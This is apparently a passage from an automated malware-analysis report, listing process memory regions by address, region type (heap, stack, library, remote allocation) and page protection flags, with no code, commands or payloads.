heap
|
page read and write
|
||
|
88AC000
|
stack
|
page read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
14FF952F000
|
heap
|
page read and write
|
||
|
8C40000
|
direct allocation
|
page read and write
|
||
|
4CDA000
|
trusted library allocation
|
page read and write
|
||
|
51DD000
|
heap
|
page read and write
|
||
|
217FCF9000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
25862000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
521E000
|
heap
|
page read and write
|
||
|
242F0000
|
remote allocation
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
8979000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
4B50000
|
trusted library allocation
|
page read and write
|
||
|
14FF8C00000
|
trusted library allocation
|
page read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
4C0E000
|
heap
|
page read and write
|
||
|
51E5000
|
heap
|
page read and write
|
||
|
51E0000
|
heap
|
page read and write
|
||
|
14FF71F2000
|
heap
|
page read and write
|
||
|
51F4000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
2628E000
|
heap
|
page read and write
|
||
|
7FC90000
|
trusted library allocation
|
page execute and read and write
|
||
|
8577000
|
stack
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
7FFD34682000
|
trusted library allocation
|
page read and write
|
||
|
50D0000
|
heap
|
page read and write
|
||
|
3094000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
25D7A000
|
heap
|
page read and write
|
||
|
4B60000
|
trusted library allocation
|
page read and write
|
||
|
217F5DF000
|
stack
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
8650000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
5208000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
72DB000
|
stack
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
14FF9517000
|
heap
|
page read and write
|
||
|
242F0000
|
remote allocation
|
page read and write
|
||
|
2EA4000
|
stack
|
page read and write
|
||
|
2E9F000
|
stack
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
4B49000
|
trusted library allocation
|
page read and write
|
||
|
14F90010000
|
trusted library allocation
|
page read and write
|
||
|
14FF959E000
|
heap
|
page read and write
|
||
|
51CE000
|
stack
|
page read and write
|
||
|
25D83000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
6CBC000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
8B60000
|
trusted library allocation
|
page read and write
|
||
|
5206000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
14FF7390000
|
heap
|
page read and write
|
||
|
51DE000
|
heap
|
page read and write
|
||
|
8BCE000
|
stack
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
7FFD3483A000
|
trusted library allocation
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
14F81D9A000
|
trusted library allocation
|
page read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
28D0000
|
heap
|
page read and write
|
||
|
5215000
|
heap
|
page read and write
|
||
|
14F818D0000
|
trusted library allocation
|
page read and write
|
||
|
51DD000
|
heap
|
page read and write
|
||
|
217FA7E000
|
stack
|
page read and write
|
||
|
14FF9575000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
51D8000
|
heap
|
page read and write
|
||
|
24C71000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
520D000
|
heap
|
page read and write
|
||
|
14FF73E5000
|
heap
|
page read and write
|
||
|
51DB000
|
heap
|
page read and write
|
||
|
4C48000
|
heap
|
page read and write
|
||
|
3124000
|
heap
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
88D7000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
4B1E000
|
unkown
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
26284000
|
heap
|
page read and write
|
||
|
14FF7370000
|
heap
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page execute and read and write
|
||
|
24AD3000
|
heap
|
page read and write
|
||
|
51F7000
|
heap
|
page read and write
|
||
|
2A5F000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
88E9000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
14FF722D000
|
heap
|
page read and write
|
||
|
14FF8D00000
|
heap
|
page read and write
|
||
|
249A0000
|
heap
|
page read and write
|
||
|
8C90000
|
direct allocation
|
page read and write
|
||
|
C61D000
|
direct allocation
|
page execute and read and write
|
||
|
7330000
|
direct allocation
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
14F81D89000
|
trusted library allocation
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
14FF94C2000
|
heap
|
page read and write
|
||
|
759D000
|
stack
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
25261000
|
heap
|
page read and write
|
||
|
14F80819000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
14FF71EC000
|
heap
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
14FF7140000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
34C3000
|
heap
|
page read and write
|
||
|
4C70000
|
heap
|
page read and write
|
||
|
51D9000
|
heap
|
page read and write
|
||
|
24990000
|
heap
|
page read and write
|
||
|
51DC000
|
heap
|
page read and write
|
||
|
24CA5000
|
heap
|
page read and write
|
||
|
14FF8C90000
|
trusted library allocation
|
page read and write
|
||
|
50D1000
|
heap
|
page read and write
|
||
|
2D98000
|
stack
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
739D000
|
stack
|
page read and write
|
||
|
34CE000
|
heap
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
88E6000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B65000
|
trusted library allocation
|
page execute and read and write
|
||
|
3110000
|
heap
|
page read and write
|
There are 777 hidden memdumps, click here to show them.